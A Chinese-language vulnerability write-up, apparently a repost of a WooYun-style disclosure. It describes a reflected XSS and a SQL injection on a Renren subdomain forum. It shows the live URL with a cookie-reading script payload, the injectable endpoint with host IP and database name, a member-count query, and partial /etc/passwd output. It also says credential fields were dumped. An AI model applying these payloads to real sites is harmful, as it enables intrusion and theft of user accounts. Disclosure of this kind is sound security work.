欢迎投稿

今日深度:

人人网分站SQL注入+反射型xss

人人网分站SQL注入+反射型xss


1.人人某bbs。

2.反射型跨站,可获取cookie。

3.sql注入,多个注入点,information_schema.columns可用,注入很方便。

4.很多个数据表,select count(*) from XXX_用户表,结果:43998。

5.可读取系统文件,例如/etc/passwd(其他的路径没找到)。

起因是发现人人网某分站的phpinfo()这个没有找到其他什么)

http://yxzb4.renren.com/index.php

结果发现,wooyun里面有提交了的,只是没处理。

http://www.wooyun.org/bugs/wooyun-2010-07040

结果偶然间,爬行到另外一个站,是一个游戏论坛。

http://yxzb.renren.com/bbs/

发现存在反射型xss,可获取cookie

http://yxzb.renren.com/bbs/viewthread.jsp

?extra=<script>document.write(document.cookie)</script>

&tid=9525

人人网分站SQL注入+反射型xss

其中几个页面都存在注入,其中一个注入信息:

Target:  http://yxzb.renren.com/bbs/faq.jsp?action=message&id=24

Host IP: 111.1.20.155

Web Server:  Apache-Coyote/1.1

DB Server:  MySQL >=5

Current DB:  jsprun

可查看系统信息:

人人网分站SQL注入+反射型xss

注入的信息:

好多个数据库:

人人网分站SQL注入+反射型xss

执行查询语句,查询用户,43998网站上显示信息:主题: 31695, 帖子: 304040, 会员: 43998)

select count(*) from  jrun_members

人人网分站SQL注入+反射型xss

用户名,密码,邮箱,salt....

人人网分站SQL注入+反射型xss

读取/etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

...略

未测试是否可以拿到shell

www.htsjk.Com true http://www.htsjk.com/shujukuaq/16724.html NewsArticle 人人网分站SQL注入+反射型xss 1.人人某bbs。 2.反射型跨站,可获取cookie。 3.sql注入,多个注入点,information_schema.columns可用,注入很方便。 4.很多个数据表,select count(*) from XXX_用户表,结果...
评论暂时关闭